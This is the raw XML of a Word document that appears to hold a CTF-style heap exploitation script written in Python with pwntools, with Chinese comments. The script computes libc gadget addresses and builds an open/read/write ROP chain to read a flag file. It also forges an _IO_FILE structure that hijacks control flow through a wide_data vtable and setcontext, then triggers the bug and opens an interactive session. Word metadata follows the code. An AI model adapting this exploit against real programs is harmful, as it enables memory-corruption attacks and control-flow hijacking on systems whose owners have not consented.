    <w:p w14:paraId="70903962" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>edit(4, pay1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F64E2C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x100, 'a')  # 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F21EBA3" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x100, p64(fake_chunk + 0x110))  # 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0359BD83" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="24C7F048" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 定义ROP链的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2559BBA5" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>fake_io = fake_chunk + 0x110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E807956" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>IO_wfile_jumps = libcbase + 0x2160c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BBD4A0" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>setcontext_61 = libcbase + 0x53a30 + 61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD8C5AF" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>open_addr = libcbase + libc.sym['open']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40248FF5" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>read_addr = libcbase + libc.sym['read']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B38B7C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>write_addr = libcbase + libc.sym['write']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FAF9F3" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>ret = libcbase + 0x562ed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E53BA51" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>str_flag_addr = heapbase + 0x2a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1F8380" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>pop_rdi_ret = libcbase + 0x2a3e5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04A9AE" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>pop_rsi_ret = libcbase + 0x2be51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE4C6E" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>pop_rdx_rbx_ret = libcbase + 0x90529</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF6F819" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="33988C48" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 构建ROP链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4A7EA5" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>rop = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE96DA4" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p64(ret) +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381FDD0F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p64(pop_rdi_ret) + p64(str_flag_addr) + p64(pop_rsi_ret) + p64(0) + p64(open_addr) +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39704FEE" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(fake_chunk) + p64(pop_rdx_rbx_ret) + p64(0x30) + p64(0x30) + p64(read_addr) +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B7423E" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p64(pop_rdi_ret) + p64(1) + p64(write_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257503C4" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151E355F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="42F235B5" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 构建伪造的_IO_FILE结构体以劫持控制流</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6103436F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>pay = flat(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553EDBA1" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C9550" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        0x30: [p64(0), p64(0), p64(0), p64(1), p64(fake_io + 0x138)],  # wide_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3179187F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        0xa0: [p64(fake_io + 0x30)],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAD9256" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        0xc0: [p64(1)],  # _mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D3AAAF" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        0xd8: [p64(IO_wfile_jumps + 0x30)],  # vtable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1147D352" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        0x110: [p64(fake_io + 0x118)],  # wide_data -&gt; vtable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8298CE" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        0x118: flat(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2CCA2A" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5470FE" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">                0x18: [p64(setcontext_61)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7FA1E8" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">            }, filler=b'\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A730EC2" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B09FB46" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        0x138: flat(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F97B41" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FA49C0" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">                0x68: [p64(fake_io + 0x1e8)],  # rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC1C20" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">                0x70: [p64(0)],  # rsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FFB524" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">                0x88: [p64(0)],  # rdx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD504C9" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">                0xa0: [p64(fake_io + 0x1e8)],  # rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002583A4" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">                0xa8: [p64(ret)]  # ret_addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A37DE48" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">            }, filler=b'\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C573060" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E787EE" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        0x1e8: flat(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585659A6" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA2B3F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">                0x00: rop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1819BF9E" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">            }, filler=b'\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED8DEED" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ECEB5C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    }, filler=b'\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E0A48" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD282D" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="5AEB0CC7" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 编辑项目以注入伪造的_IO_FILE结构体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0656249C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>edit(8, pay[0x10:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C720E1" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>cmd(5)  # 触发漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4DE15E" w14:textId="3F453806" w:rsidR="00477DCF" w:rsidRPr="00477DCF" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>p.interactive()  # 进入交互模式</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00477DCF" w:rsidRPr="00477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ACF238" w14:textId="77777777" w:rsidR="0042580A" w:rsidRDefault="0042580A" w:rsidP="00477DCF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="43730DBA" w14:textId="77777777" w:rsidR="0042580A" w:rsidRDefault="0042580A" w:rsidP="00477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7B3B85" w14:textId="77777777" w:rsidR="0042580A" w:rsidRDefault="0042580A" w:rsidP="00477DCF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4E240964" w14:textId="77777777" w:rsidR="0042580A" w:rsidRDefault="0042580A" w:rsidP="00477D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E2"/>
    <w:rsid w:val="001C39B4"/>
    <w:rsid w:val="002067AD"/>
    <w:rsid w:val="00245005"/>
    <w:rsid w:val="0042580A"/>
    <w:rsid w:val="00477DCF"/>
    <w:rsid w:val="004E1EE2"/>
    <w:rsid w:val="004E4F4A"/>
    <w:rsid w:val="00504B2C"/>
    <w:rsid w:val="00651754"/>
    <w:rsid w:val="00786BC5"/>
    <w:rsid w:val="00966750"/>
    <w:rsid w:val="00B00CB8"/>
    <w:rsid w:val="00C51CB9"/>
    <w:rsid w:val="00D44DF2"/>
    <w:rsid w:val="00D574E2"/>
    <w:rsid w:val="00E2294C"/>
    <w:rsid w:val="00EA1381"/>
    <w:rsid w:val="00EF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58521"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{29B21B5A-3492-4E89-8821-9FDE6F56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7D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7D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67AD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DC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7D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7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7DC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77DCF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77DCF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77DCF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77D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067AD"/>
    <w:rPr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承达 李</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>zhuohang Li</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-21T06:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-24T12:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>